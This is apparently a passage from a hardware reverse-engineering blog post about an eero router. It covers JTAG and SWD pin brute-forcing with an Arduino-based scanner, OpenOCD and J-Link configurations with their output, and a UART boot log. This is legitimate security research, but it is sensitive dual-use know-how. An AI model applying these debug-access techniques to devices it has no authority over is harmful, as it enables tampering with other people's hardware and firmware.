9 -----| A7 = B7 |---- D8 | 7
10 ----| A8 = B8 |---- D9 | 8
Taking photos of all the wires connected wasn't very helpful, so I decided to create this diagram of how all the components were connected:
Note: Also notice a little dot on the left side of pin 1 (1.8v line) on the eero device, which indicates the first pin.
Logic level shifter
These 10 pins on the eero device operate at 1.8v, whereas the Arduino operates at 3.3v or 5v. I therefore needed to use a logic level shifter. A logic level shifter is a circuit board that lets two devices operating at different voltages communicate with each other. A short video explanation here. I used an 8-channel shifter called TXS0108E.
Arduino Nano
I also used a cheap little Arduino Nano RP2040 to act as my JTAG and SWD brute force tool. It was reprogrammed with two different PlatformIO projects created by szymonh, one for JTAG called JTAGscan and the other for SWD called SWDscan.
Alternatively, you could use go-jtagenum, which works on Raspberry Pi models.
Brute force The JTAGscan tool supports three different attack types (BYPASS, IDCODE, and BYPASS with just TDI). I made sure pins 2-8 were selected using the mask argument m with the value 0x1fc, or 508 in decimal.
Not seen in the output below, but I used the e option to enumerate and a to run all checks.
JTAG requires at least four pins (TCLK, TMS, TDI, and TDO) to operate, and for SWD it's just two (SWCLK and SWDIO).
Note: The pin numbers in this section may be different from the previous sections.
> m
Enter pin mask 0x1fc
Pin mask set to 111111100
...
+-------------------------------+
| 4 | 2 | 6 | 8 | 32 |
+----------- SUCCESS -----------+
| TCK | TMS | TDO | TDI | Width |
+------ BYPASS complete --------+
...
+-------------------------------+
| 4 | 2 | 6 | dba00477 |
+----------- SUCCESS -----------+
| TCK | TMS | TDO | IDCODE |
+------ IDCODE complete --------+
TCK, TMS, and TDO found.
...
+-- BYPASS searching, just TDI -+
| TCK | TMS | TDO | TDI | Width |
+-------------------------------+
| 4 | 2 | 6 | 8 | 32 |
+----------- SUCCESS -----------+
JTAG pins found, along with the chip IDCODE dba00477.
TCK is pin 4
TMS is pin 2
TDO is pin 6
TDI is pin 8
SWDscan
Although not required, since we've already identified the JTAG interface, which can be translated to TCLK = SWCLK and TMS = SWDIO.
We can do it for the sake of completeness.\nSimilar to the previous tool, here is the output:\n\u0026gt; m\nEnter pin mask\n0x1fc\nPin mask set to 111111100\n\u0026gt; e\n+-------------------------------------------+\n| CLK PIN | IO PIN | ACK | PART NO | MAN ID |\n+-------------------------------------------+\n|    2    |   3    |  7  |  ffff   |  7ff   |\n|    2    |   4    |  7  |  ffff   |  7ff   |\n|    2    |   5    |  7  |  ffff   |  7ff   |\n|    2    |   6    |  7  |  ffff   |  7ff   |\n|    2    |   7    |  7  |  ffff   |  7ff   |\n|    2    |   8    |  7  |  ffff   |  7ff   |\n|    3    |   2    |  7  |  ffff   |  7ff   |\n|    3    |   4    |  7  |  ffff   |  7ff   |\n|    3    |   5    |  7  |  ffff   |  7ff   |\n|    3    |   6    |  7  |  ffff   |  7ff   |\n|    3    |   7    |  7  |  ffff   |  7ff   |\n|    3    |   8    |  7  |  ffff   |  7ff   |\n|    4    |   2    |  1  |  ba02   |  23b   |\n+----------------- SUCCESS -----------------+\nNotice where the manufacturer ID changes.\nSWCLK is pin 4\nSWDIO is pin 2\nDiscovered JTAG/SWD pinout\nDebug interface Now that we know the pins for both JTAG and SWD, we need a debug adapter such as an Adafruit FT232H (supports I2C, SPI, JTAG, UART, etc.) to communicate with the eero device. The adapter is based on the widely supported FTDI chip and works well with Linux tools.\nOpenOCD To communicate with the discovered JTAG interface, I used the open-source utility OpenOCD. OpenOCD provides on-chip debugging, in-system programming, memory flashing, and boundary-scan testing.
It supports a broad range of debugger adapters and it\u0026rsquo;s free; the catch is that it can sometimes be a pain to configure, especially when the chip you\u0026rsquo;re trying to debug is unknown.\nI used the latest version, built from source.\nMy debugger.cfg adapter config for the Adafruit FT232H (USB type-c) device:\n# FT232H based USB-serial adaptor\n#\n# TCK: D0\n# TDI: D1\n# TDO: D2\n# TMS: D3\n# TRST: D4\n# SRST: D5\n# RTCK: D7\n# speed\nadapter speed 1000\n# Setup driver type\nadapter driver ftdi\n# Common PID for FT232H\nftdi vid_pid 0x0403 0x6014\nftdi layout_init 0x0078 0x017b\n# Set sampling to allow higher clock speed\nftdi tdo_sample_edge falling\n# Reset pins\n#ftdi layout_signal nTRST -ndata 0x0010 -noe 0x0040\n#ftdi layout_signal nSRST -ndata 0x0020 -noe 0x0040\n# debug mode either jtag or swd\ntransport select jtag\n#transport select swd\n#reset_config trst_only\nI used a simple \u0026ldquo;probe\u0026rdquo; config for JTAG, probe_jtag.cfg, to identify chip IDs:\n# JTAG adapter settings\nscript debugger.cfg\n#scan_chain\ninit\ndap info\nshutdown\nJTAG\nnaz@rasp4:~ $ sudo openocd -f debugger.cfg -f probe_jtag.cfg\nOpen On-Chip Debugger 0.12.0+dev-01082-gfc30feb51 (2023-03-12-23:07)\nLicensed under GNU GPL v2\nFor bug reports, read http://openocd.org/doc/doxygen/bugs.html\ntrst_only separate trst_push_pull\nInfo : clock speed 1000 kHz\nWarn : There are no enabled taps. AUTO PROBING MIGHT NOT WORK!!\nInfo : JTAG tap: auto0.tap tap/device found: 0x5ba00477 (mfg: 0x23b (ARM Ltd), part: 0xba00, ver: 0x5)\nInfo : JTAG tap: auto1.tap tap/device found: 0x001390e1 (mfg: 0x070 (Qualcomm), part: 0x0139, ver: 0x0)\nWarn : AUTO auto0.tap - use \u0026#34;jtag newtap auto0 tap -irlen 4 -expected-id 0x5ba00477\u0026#34;\nWarn : AUTO auto1.tap - use \u0026#34;jtag newtap auto1 tap -irlen 11 -expected-id 0x001390e1\u0026#34;\nWarn : gdb services need one or more targets defined\nshutdown command invoked\nOpenOCD found two TAP devices with the chip IDs 0x5ba00477 and 0x001390e1.
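The fields OpenOCD reports (mfg/part/ver) are just bit slices of the 32-bit IDCODE: version in bits [31:28], part number in [27:12], and the JEP106 manufacturer ID in [11:1], with bit 0 always set. A quick decode of both discovered IDs:

```python
def decode_idcode(idcode):
    """Split a 32-bit JTAG IDCODE into its standard fields."""
    return {
        "version": (idcode >> 28) & 0xF,
        "part":    (idcode >> 12) & 0xFFFF,
        "mfg":     (idcode >> 1) & 0x7FF,   # JEP106 manufacturer ID
        "marker":  idcode & 1,              # always 1 for a valid IDCODE
    }

for tap_id in (0x5BA00477, 0x001390E1):
    f = decode_idcode(tap_id)
    print(f"{tap_id:#010x}: ver={f['version']:#x} part={f['part']:#06x} mfg={f['mfg']:#05x}")
```

Running this reproduces OpenOCD's interpretation: 0x5ba00477 is ARM Ltd (mfg 0x23b, part 0xba00, ver 0x5) and 0x001390e1 is Qualcomm (mfg 0x070, part 0x0139, ver 0x0).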
I then used these values to create a new config file that attempted to invoke these TAP interfaces.\nHere\u0026rsquo;s my fourth attempt, after reading wrongbaud\u0026rsquo;s post several times:\n# Name of the SoC\nif { [info exists CHIPNAME] } {\n set _CHIPNAME $CHIPNAME\n} else {\n set _CHIPNAME qualcomm\n}\n# This is the TAP ID that we discovered in the previous step\nif { [info exists CPUTAPID] } {\n set _CPUTAPID $CPUTAPID\n} else {\n set _CPUTAPID 0x5ba00477\n}\n# Unknown at this point\n#reset_config trst_only\n#reset_config srst_only\n# Here we create the JTAG TAP/DAP, defining the location and characteristics of our DAP\n# add -ignore-syspwrupack\njtag newtap $_CHIPNAME cpu -irlen 4 -ircapture 0x1 -irmask 0xf -expected-id $_CPUTAPID\ndap create $_CHIPNAME.dap -chain-position $_CHIPNAME.cpu -ignore-syspwrupack -adiv6\njtag newtap auto0 tap -irlen 11 -ircapture 0x1 -expected-id 0x001390e1\ndap create auto0.dap -chain-position $_CHIPNAME.cpu -ignore-syspwrupack -adiv6\n#set _TARGETNAME $_CHIPNAME.cpu\n#set _TARGETNAME $_CHIPNAME.cpu.0\n# Sort of working\ntarget create $_CHIPNAME.dap.0 cortex_a -dap auto0.dap\ntarget create lol cortex_a -dap $_CHIPNAME.dap\n# Semi-working - testing\n#target create lol cortex_m -dap $_CHIPNAME.dap -coreid 0\n#target create lol2 cortex_m -dap auto0.dap\ninit\nIn another terminal window, I connected to the debug interface and issued a few DAP commands:\nnaz@rasp4:~ $ nc localhost 4444 Open On-Chip Debugger \u0026gt; dap info 0 dap info 0 AP # 0x0 AP ID register 0x14770004 Type is MEM-AP AXI3 or AXI4 MEM-AP BASE 0x00000002 No ROM table present \u0026gt; dap info 1 dap info 1 JTAG-DP STICKY ERROR AP # 0x1 AP ID register 0x44770002 Type is MEM-AP APB2 or APB3 MEM-AP BASE 0x80000000 ROM table in legacy format Component base address 0x80000000 Can\u0026#39;t read component, the corresponding core might be turned off \u0026gt; dap info 2 dap info 2 AP # 0x2 AP ID register 0x24760010 Type is JTAG-AP \u0026gt; dap info 3 dap info 3 JTAG-DP STICKY ERROR AP # 0x3 AP
ID register 0x24770011 Type is MEM-AP AHB3 MEM-AP BASE 0xe00ff003 Valid ROM table present Component base address 0xe00ff000 Can\u0026#39;t read component, the corresponding core might be turned off \u0026gt; dap info 4 AP # 0x4 AP ID register 0x24770011 Type is MEM-AP AHB3 MEM-AP BASE 0xe00ff003 Valid ROM table present Component base address 0xe00ff000 Peripheral ID 0x04000bb4c3 Designer is 0x23b, ARM Ltd Part is 0x4c3, Cortex-M3 ROM (ROM Table) Component class is 0x1, ROM table MEMTYPE system memory present on bus ROMTABLE[0x0] = 0xfff0f003 Component base address 0xe000e000 Peripheral ID 0x04000bb000 Designer is 0x23b, ARM Ltd Part is 0x000, Cortex-M3 SCS (System Control Space) Component class is 0xe, Generic IP component ROMTABLE[0x4] = 0xfff02003 Component base address 0xe0001000 Invalid CID 0x00000000 ROMTABLE[0x8] = 0xfff03003 Component base address 0xe0002000 Peripheral ID 0x04002bb003 Designer is 0x23b, ARM Ltd Part is 0x003, Cortex-M3 FPB (Flash Patch and Breakpoint) Component class is 0xe, Generic IP component ROMTABLE[0xc] = 0xfff01003 Component base address 0xe0000000 Invalid CID 0xb1b1b1b1 ROMTABLE[0x10] = 0xfff41002 Component not present ROMTABLE[0x14] = 0xfff42003 Component base address 0xe0041000 Peripheral ID 0x04003bb924 Designer is 0x23b, ARM Ltd Part is 0x924, Cortex-M3 ETM (Embedded Trace) Component class is 0x9, CoreSight component Type is 0x13, Trace Source, Processor ROMTABLE[0x18] = 0xfff45003 Component base address 0xe0044000 Peripheral ID 0x04004bb906 Designer is 0x23b, ARM Ltd Part is 0x906, CoreSight CTI (Cross Trigger) Component class is 0x9, CoreSight component Type is 0x14, Debug Control, Trigger Matrix Dev Arch is 0x8ef00a14, DSL Memory \u0026#34;unknown\u0026#34; rev.0 ROMTABLE[0x1c] = 0x00000000 End of ROM table Sadly, it looks like we don\u0026rsquo;t have access to all cores or that they have been disabled based on the JTAG-DP STICKY ERROR error. 
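As a side note, the AP ID register values OpenOCD printed can be unpacked by hand. The sketch below follows the Arm ADIv5 IDR layout as I understand it (class in bits [16:13], where 0x8 means MEM-AP; type in [3:0]; JEP106 designer code in [27:17]); treat it as a rough decoder and verify against the spec for the exact DP/AP versions on this SoC:

```python
# Rough ADIv5 AP IDR decoder; field layout assumed from the ADIv5 spec.
AP_TYPES = {0x0: "JTAG-AP", 0x1: "AHB", 0x2: "APB", 0x4: "AXI"}  # subset

def decode_ap_idr(idr):
    cont = (idr >> 24) & 0xF     # JEP106 continuation code
    ident = (idr >> 17) & 0x7F   # JEP106 identity code
    return {
        "class": (idr >> 13) & 0xF,            # 0x8 = MEM-AP
        "type": AP_TYPES.get(idr & 0xF, "?"),
        "designer": (cont << 7) | ident,       # 0x23b = ARM Ltd
    }

# The four distinct IDR values seen in the dap info output above
for idr in (0x14770004, 0x44770002, 0x24760010, 0x24770011):
    print(f"{idr:#010x} -> {decode_ap_idr(idr)}")
```

The results line up with what OpenOCD printed: an AXI MEM-AP, an APB MEM-AP, a JTAG-AP, and AHB MEM-APs, all designed by ARM (0x23b).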
I was able to get a RAM dump of some other component, but it wasn\u0026rsquo;t the NAND flash where the device firmware is stored (disappointing).\nSWD To make the SWD interface work properly with the Adafruit FT232H, I had to bridge pins D1 and D2 through a 330 Ohm resistor. Here\u0026rsquo;s what the wiring looked like:\nPin 4 was connected to D0\nPin 2 was connected to D1\nAnd here\u0026rsquo;s the output produced by openocd:\nnaz@rasp4:~ $ sudo openocd -f probe_swd.cfg\nOpen On-Chip Debugger 0.12.0+dev-01082-gfc30feb51 (2023-03-12-23:07)\nLicensed under GNU GPL v2\nFor bug reports, read http://openocd.org/doc/doxygen/bugs.html\nInfo : FTDI SWD mode enabled\nInfo : Listening on port 6666 for tcl connections\nInfo : Listening on port 4444 for telnet connections\nInfo : clock speed 200 kHz\nInfo : SWD DPIDR 0x5ba02477\nWarn : gdb services need one or more targets defined\nStrangely, the ID 0x5ba02477 was not the same as the one I saw earlier while trying to brute force.\nBonus (using J-Link EDU) I got annoyed at openocd, probably because I don\u0026rsquo;t know how to use it properly, so I decided to try a different tool. I bought the industry-standard JTAG debugger, the Segger J-Link debug adapter. I found an EDU Mini on sale for around £60 on mouser.co.uk.\nBut I was still unsuccessful at getting the CPU to halt execution. Here\u0026rsquo;s the output:\nSEGGER J-Link Commander V7.88c (Compiled May 16 2023 15:45:34) DLL version V7.88c, compiled May 16 2023 15:43:58 Connecting to J-Link via USB...O.K. Firmware: J-Link EDU Mini V1 compiled May 16 2023 10:45:21 Hardware version: V1.00 J-Link uptime (since boot): 0d 00h 14m 51s S/N: 801044989 License(s): FlashBP, GDB USB speed mode: Full speed (12 MBit/s) VTref=3.266V Type \u0026#34;connect\u0026#34; to establish a target connection, \u0026#39;?\u0026#39; for help J-Link\u0026gt;connect Please specify device / core. \u0026lt;Default\u0026gt;: ARM7 Type \u0026#39;?\u0026#39; for selection dialog Device\u0026gt;?
Please specify target interface: J) JTAG (Default) S) SWD T) cJTAG TIF\u0026gt;j Device position in JTAG chain (IRPre,DRPre) \u0026lt;Default\u0026gt;: -1,-1 =\u0026gt; Auto-detect JTAGConf\u0026gt; Specify target interface speed [kHz]. \u0026lt;Default\u0026gt;: 4000 kHz Speed\u0026gt;200 Device \u0026#34;CORTEX-M3\u0026#34; selected. Connecting to target via JTAG TotalIRLen = 15, IRPrint = 0x0011 JTAG chain detection found 2 devices: #0 Id: 0x5BA00477, IRLen: 04, CoreSight JTAG-DP #1 Id: 0x001390E1, IRLen: 11, Unknown device DAP: Could not power-up system power domain. DPv0 detected Scanning AP map to find all available APs AP[5]: Stopped AP scan as end of AP map has been reached AP[0]: AXI-AP (IDR: 0x14770004) AP[1]: APB-AP (IDR: 0x44770002) AP[2]: JTAG-AP (IDR: 0x24760010) AP[3]: AHB-AP (IDR: 0x24770011) AP[4]: AHB-AP (IDR: 0x24770011) Iterating through AP map to find AHB-AP to use AP[0]: Skipped. Not an AHB-AP AP[1]: Skipped. Not an AHB-AP AP[2]: Skipped. Not an AHB-AP AP[3]: Skipped. Invalid implementer code read from CPUIDVal[31:24] = 0x00 AP[4]: Core found AP[4]: AHB-AP ROM base: 0xE00FF000 CPUID register: 0x412FC231. Implementer code: 0x41 (ARM) Found Cortex-M3 r2p1, Little endian. FPUnit: 6 code (BP) slots and 2 literal slots CoreSight components: ROMTbl[0] @ E00FF000 [0][0]: E000E000 CID B105E00D PID 000BB000 SCS [0][1]: E0001000 CID B105E00D PID 003BB002 DWT [0][2]: E0002000 CID B105E00D PID 002BB003 FPB [0][3]: E0000000 CID B105E00D PID 003BB001 ITM [0][5]: E0041000 CID B105900D PID 003BB924 ETM-M3 [0][6]: E0044000 CID B105900D PID 004BB906 CTI Memory zones: Zone: \u0026#34;Default\u0026#34; Description: Default access mode Cortex-M3 identified. J-Link\u0026gt; J-Link\u0026gt;JTAGId JTAG Id: 0x5BA00477 Version: 0x5 Part no: 0xba00 Man. Id: 023B J-Link\u0026gt;reset Reset delay: 0 ms Reset type NORMAL: Resets core \u0026amp; peripherals via SYSRESETREQ \u0026amp; VECTRESET bit. Reset: Halt core after reset via DEMCR.VC_CORERESET. 
Reset: Reset device via AIRCR.SYSRESETREQ. Reset: CPU may have not been reset (DHCSR.S_RESET_ST never gets set). Reset: Using fallback: Reset pin. Reset: Halt core after reset via DEMCR.VC_CORERESET. Reset: Reset device via reset pin Reset: VC_CORERESET did not halt CPU. (Debug logic also reset by reset pin?). Reset: Reconnecting and manually halting CPU. DAP: Could not power-up system power domain. DPv0 detected AP map detection skipped. Manually configured AP map found. AP[0]: MEM-AP (IDR: Not set) AP[1]: MEM-AP (IDR: Not set) AP[2]: MEM-AP (IDR: Not set) AP[3]: MEM-AP (IDR: Not set) AP[4]: AHB-AP (IDR: Not set) AP[4]: Core found AP[4]: AHB-AP ROM base: 0xE00FF000 CPUID register: 0x412FC231. Implementer code: 0x41 (ARM) Found Cortex-M3 r2p1, Little endian. CPU could not be halted Reset: Core did not halt after reset, trying to disable WDT. Reset: Halt core after reset via DEMCR.VC_CORERESET. Reset: Reset device via reset pin Reset: VC_CORERESET did not halt CPU. (Debug logic also reset by reset pin?). Reset: Reconnecting and manually halting CPU. DAP: Could not power-up system power domain. DPv0 detected AP map detection skipped. Manually configured AP map found. AP[0]: MEM-AP (IDR: Not set) AP[1]: MEM-AP (IDR: Not set) AP[2]: MEM-AP (IDR: Not set) AP[3]: MEM-AP (IDR: Not set) AP[4]: AHB-AP (IDR: Not set) AP[4]: Core found AP[4]: AHB-AP ROM base: 0xE00FF000 CPUID register: 0x412FC231. Implementer code: 0x41 (ARM) Found Cortex-M3 r2p1, Little endian. CPU could not be halted CPU could not be halted ****** Error: Failed to halt CPU. J-Link\u0026gt; At this point I figured it\u0026rsquo;s time to move on, as I wasn\u0026rsquo;t getting anywhere. 
It\u0026rsquo;s very possible that an additional pin must be pulled up or down to activate the JTAG interface, but who knows\u0026hellip; probably the manufacturers do.\nSerial Those three pins on the top of the device were indeed a serial or UART interface, and after setting the correct baud rate of 115200 and the TX \u0026amp; RX pins I was presented with the following output during bootup:\nFormat: Log Type - Time(microsec) - Message - Optional Info Log Type: B - Since Boot(Power On Reset), D - Delta, S - Statistic S - QC_IMAGE_VERSION_STRING=BOOT.XF.0.3-00089-IPQ60xxLZB-2 S - IMAGE_VARIANT_STRING=IPQ6018LA S - OEM_IMAGE_VERSION_STRING=crm-ubuntu20 S - Boot Interface: eMMC S - Secure Boot: On S - Boot Config @ 0x000a602c = 0x000002e3 S - JTAG ID @ 0x000a607c = 0x001390e1 S - OEM ID @ 0x000a6080 = 0x007ab15b S - Serial Number @ 0x000a4128 = 0x808edc43 S - Feature Config Row 0 @ 0x000a4130 = 0x0000800018200021 S - Feature Config Row 1 @ 0x000a4138 = 0x02c3e83783000009 S - PBL Patch Ver: 1 S - I-cache: On S - D-cache: On B - 3413 - PBL, Start B - 592 - bootable_media_detect_entry, Start B - 4339 - bootable_media_detect_success, Start B - 52365 - elf_loader_entry, Start B - 52535 - auth_hash_seg_entry, Start B - 53716 - auth_hash_seg_exit, Start B - 63087 - elf_segs_hash_verify_entry, Start B - 89985 - elf_segs_hash_verify_exit, Start B - 94168 - auth_xbl_sec_hash_seg_entry, Start B - 94313 - auth_xbl_sec_hash_seg_exit, Start B - 100648 - xbl_sec_segs_hash_verify_entry, Start B - 100649 - xbl_sec_segs_hash_verify_exit, Start B - 101578 - PBL, End B - 86528 - SBL1, Start B - 219935 - GCC [RstStat:0x0, RstDbg:0x600000] WDog Stat : 0x4 B - 222375 - clock_init, Start D - 2806 - clock_init, Delta B - 230915 - boot_flash_init, Start D - 32116 - boot_flash_init, Delta B - 266417 - sbl1_ddr_set_default_params, Start D - 335 - sbl1_ddr_set_default_params, Delta B - 272822 - boot_config_data_table_init, Start D - 2287 - boot_config_data_table_init, Delta - (575 Bytes) B - 281942 -
CDT Version:2,Platform ID:8,Major ID:3,Minor ID:2,Subtype:144 B - 287523 - Image Load, Start D - 6618 - OEM_MISC Image Loaded, Delta - (0 Bytes) B - 297009 - Image Load, Start D - 5063 - PMIC Image Loaded, Delta - (0 Bytes) B - 304878 - sbl1_ddr_set_params, Start B - 309941 - CPR configuration: 0x366 B - 313052 - Pre_DDR_clock_init, Start D - 183 - Pre_DDR_clock_init, Delta D - 0 - sbl1_ddr_set_params, Delta B - 348005 - Image Load, Start D - 427 - APDP Image Loaded, Delta - (0 Bytes) B - 366122 - Image Load, Start D - 427 - QTI_MISC Image Loaded, Delta - (0 Bytes) B - 368714 - Image Load, Start D - 7778 - Auth Metadata D - 610 - Segments hash check D - 19886 - QSEE Dev Config Image Loaded, Delta - (36498 Bytes) B - 390705 - Image Load, Start D - 13176 - Auth Metadata D - 10279 - Segments hash check D - 101626 - QSEE Image Loaded, Delta - (1435236 Bytes) B - 492758 - Image Load, Start D - 7625 - Auth Metadata D - 1006 - Segments hash check D - 22295 - RPM Image Loaded, Delta - (102676 Bytes) B - 516395 - Image Load, Start D - 7564 - Auth Metadata D - 3233 - Segments hash check D - 37058 - APPSBL Image Loaded, Delta - (576208 Bytes) B - 581940 - SBL1, End D - 495717 - SBL1, Delta S - Flash Throughput, 39000 KB/s (2151865 Bytes, 54250 us) S - Core 0 Frequency, 800 MHz S - DDR Frequency, 466 MHz eero u-boot 1.2.7-0d393c56b2-l (Dec 11 2021 - 04:44:51 +0000) DRAM: smem ram ptable found: ver: 2 len: 4 512 MiB NAND: Could not find nand-flash in device tree SF: Unsupported flash IDs: manuf 00, jedec 0000, ext_jedec 0000 ipq_spi: SPI Flash not found (bus/cs/speed/mode) = (0/0/48000000/0) 0 MiB MMC: \u0026lt;NULL\u0026gt;: 0 (eMMC) PCI0 is not defined in the device tree In: serial@78B1000 Out: serial@78B1000 Err: serial@78B1000 model: [andytown-g] machid: 8030290 eth0 MAC Address from ART is not valid eth1 MAC Address from ART is not valid eth2 MAC Address from ART is not valid eth3 MAC Address from ART is not valid eth4 MAC Address from ART is not valid eth5 MAC Address 
from ART is not valid board_register_value should be: 05 Net: MAC0 addr:0:3:7f:ba:db:ad PHY ID1: 0x4d PHY ID2: 0xd0b2 EDMA ver 1 hw init Num rings - TxDesc:1 (0-0) TxCmpl:1 (0-0) RxDesc:1 (15-15) RxFill:1 (7-7) ipq6018_edma_alloc_rings: successfull ipq6018_edma_setup_ring_resources: successfull ipq6018_edma_configure_rings: successfull ipq6018_edma_hw_init: successfull eth0 Warning: eth0 MAC addresses don\u0026#39;t match: Address in SROM is 00:03:7f:ba:db:ad Address in environment is c0:36:53:c5:1b:80 eero_boot:bootdelay enforced [0] Hit any key to stop autoboot: 0 USB0: Register 2000140 NbrPorts 2 Starting the controller USB XHCI 1.10 scanning bus 0 for devices... 1 USB Device(s) found USB1: Register 1000140 NbrPorts 1 Starting the controller USB XHCI 1.10 scanning bus 1 for devices... 1 USB Device(s) found eero_boot:network boot disabled eero_boot:booting usb eero_boot:booting mmc eero_boot:loading [eero_kernel.mbn] from partition [0:10] sha1+ ## Loading kernel from FIT Image at 44000000 ... Using \u0026#39;conf@qcom-ipq6018-andytown-g.dtb\u0026#39; configuration Trying \u0026#39;kernel-1\u0026#39; kernel subimage Description: Linux kernel Type: Kernel Image Compression: gzip compressed Data Start: 0x44000104 Data Size: 14904410 Bytes = 14.2 MiB Architecture: ARM OS: Linux Load Address: 0x41208000 Entry Point: 0x41208000 Hash algo: sha1 Hash value: 60081f4bab9232d1eb5347fe9274ccdda856984d Verifying Hash Integrity ... sha1+ OK ## Loading fdt from FIT Image at 44000000 ... Using \u0026#39;conf@qcom-ipq6018-andytown-g.dtb\u0026#39; configuration Trying \u0026#39;fdt-qcom-ipq6018-andytown-g.dtb\u0026#39; fdt subimage Description: Flattened Device Tree blob Type: Flat Device Tree Compression: uncompressed Data Start: 0x44e36e6c Data Size: 70023 Bytes = 68.4 KiB Architecture: ARM Hash algo: sha1 Hash value: 0d37e519497e619feb18fb237b7041cf703daae0 Verifying Hash Integrity ... sha1+ OK Booting using the fdt blob at 0x44e36e6c Uncompressing Kernel Image ... 
OK Loading Device Tree to 484eb000, end 484ff186 ... OK Could not find PCI in device tree Using machid 0x8030290 from environment Starting kernel ... [ 0.000000] Booting Linux on physical CPU 0x0 [ 0.000000] Initializing cgroup subsys cpuset [ 0.000000] Initializing cgroup subsys cpu [ 0.000000] Initializing cgroup subsys cpuacct [ 0.000000] Linux version 4.4.60-yocto-standard-eero (oe-user@oe-host) (gcc version 9.3.0 (GCC) ) #1 SMP PREEMPT Fri Feb 3 04:36:19 UTC 2023 [ 0.000000] CPU: ARMv7 Processor [51af8014] revision 4 (ARMv7), cr=10c0383d [ 0.000000] CPU: PIPT / VIPT nonaliasing data cache, VIPT aliasing instruction cache [ 0.000000] Machine model: andytown-g [ 0.000000] Ignoring memory range 0x40000000 - 0x41000000 [ 0.000000] cma: Reserved 28 MiB at 0x5e400000 [ 0.000000] Memory policy: Data cache writealloc [ 0.000000] psci: probing for conduit method from DT. [ 0.000000] psci: PSCIv1.0 detected in firmware. [ 0.000000] psci: Using standard PSCI v0.2 function IDs [ 0.000000] psci: MIGRATE_INFO_TYPE not supported. [ 0.000000] PERCPU: Embedded 11 pages/cpu @9cf30000 s15436 r8192 d21428 u45056 [ 0.000000] Built 1 zonelists in Zone order, mobility grouping on. 
Total pages: 110244 [ 0.000000] Kernel command line: ro systemd.verity_root_data=/dev/mmcblk0p18 systemd.verity_root_hash=/dev/loop10 roothash=d03330e57280e4481417b8146dc2be5af2559dfca299e67a4415fcb7e5305f7b fsck.repair=yes swiotlb=1 coherent_pool=2M [ 0.000000] PID hash table entries: 2048 (order: 1, 8192 bytes) [ 0.000000] Dentry cache hash table entries: 65536 (order: 6, 262144 bytes) [ 0.000000] Inode-cache hash table entries: 32768 (order: 5, 131072 bytes) [ 0.000000] Memory: 389508K/445440K available (6315K kernel code, 483K rwdata, 2056K rodata, 11264K init, 366K bss, 27260K reserved, 28672K cma-reserved, 0K highmem) [ 0.000000] Virtual kernel memory layout: [ 0.000000] vector : 0xffff0000 - 0xffff1000 ( 4 kB) [ 0.000000] fixmap : 0xffc00000 - 0xfff00000 (3072 kB) [ 0.000000] vmalloc : 0x9f800000 - 0xff800000 (1536 MB) [ 0.000000] lowmem : 0x80000000 - 0x9f000000 ( 496 MB) [ 0.000000] pkmap : 0x7fe00000 - 0x80000000 ( 2 MB) [ 0.000000] modules : 0x7f000000 - 0x7fe00000 ( 14 MB) [ 0.000000] .text : 0x80208000 - 0x80b2ce44 (9364 kB) [ 0.000000] .init : 0x80c00000 - 0x81700000 (11264 kB) [ 0.000000] .data : 0x81700000 - 0x81778d0c ( 484 kB) [ 0.000000] .bss : 0x8177b000 - 0x817d6858 ( 367 kB) [ 0.000000] SLUB: HWalign=64, Order=0-3, MinObjects=0, CPUs=4, Nodes=1 [ 0.000000] Preemptible hierarchical RCU implementation. [ 0.000000] Build-time adjustment of leaf fanout to 32. [ 0.000000] NR_IRQS:16 nr_irqs:16 16 [ 0.000000] Architected cp15 timer(s) running at 24.00MHz (virt). [ 0.000000] clocksource: arch_sys_counter: mask: 0xffffffffffffff max_cycles: 0x588fe9dc0, max_idle_ns: 440795202592 ns [ 0.000005] sched_clock: 56 bits at 24MHz, resolution 41ns, wraps every 4398046511097ns [ 0.000016] Switching to timer-based delay loop, resolution 41ns [ 0.000672] Calibrating delay loop (skipped), value calculated using timer frequency.. 
48.00 BogoMIPS (lpj=240000) [ 0.000684] pid_max: default: 32768 minimum: 301 [ 0.000776] Mount-cache hash table entries: 1024 (order: 0, 4096 bytes) [ 0.000786] Mountpoint-cache hash table entries: 1024 (order: 0, 4096 bytes) [ 0.001305] Initializing cgroup subsys io [ 0.001322] Initializing cgroup subsys memory [ 0.001346] Initializing cgroup subsys devices [ 0.001361] Initializing cgroup subsys freezer [ 0.001371] Initializing cgroup subsys net_cls [ 0.001381] Initializing cgroup subsys pids [ 0.001403] CPU: Testing write buffer coherency: ok [ 0.001765] CPU0: thread -1, cpu 0, socket 0, mpidr 80000000 [ 0.001815] Setting up static identity map for 0x41300000 - 0x41300058 [ 0.054348] MSM Memory Dump base table set up [ 0.054373] MSM Memory Dump apps data table set up [ 0.090260] CPU1: thread -1, cpu 1, socket 0, mpidr 80000001 [ 0.120242] CPU2: thread -1, cpu 2, socket 0, mpidr 80000002 [ 0.150274] CPU3: thread -1, cpu 3, socket 0, mpidr 80000003 [ 0.150328] Brought up 4 CPUs [ 0.150349] SMP: Total of 4 processors activated (192.00 BogoMIPS). [ 0.150355] CPU: All CPU(s) started in SVC mode. [ 0.150739] devtmpfs: initialized [ 0.168648] VFP support v0.3: implementor 51 architecture 3 part 40 variant 3 rev 4 [ 0.168950] clocksource: jiffies: mask: 0xffffffff max_cycles: 0xffffffff, max_idle_ns: 19112604462750000 ns [ 0.168976] futex hash table entries: 1024 (order: 4, 65536 bytes) [ 0.170182] pinctrl core: initialized pinctrl subsystem [ 0.171312] NET: Registered protocol family 16 [ 0.173008] DMA: preallocated 2048 KiB pool for atomic coherent allocations [ 0.200103] cpuidle: using governor ladder [ 0.230121] cpuidle: using governor menu [ 0.230307] NET: Registered protocol family 42 [ 0.245022] irq: no irq domain found for /soc/smp2p-wcss/slave-kernel ! [ 0.248057] irq: no irq domain found for /soc/smp2p-wcss/slave-kernel ! [ 0.257030] hw-breakpoint: found 5 (+1 reserved) breakpoint and 4 watchpoint registers. 
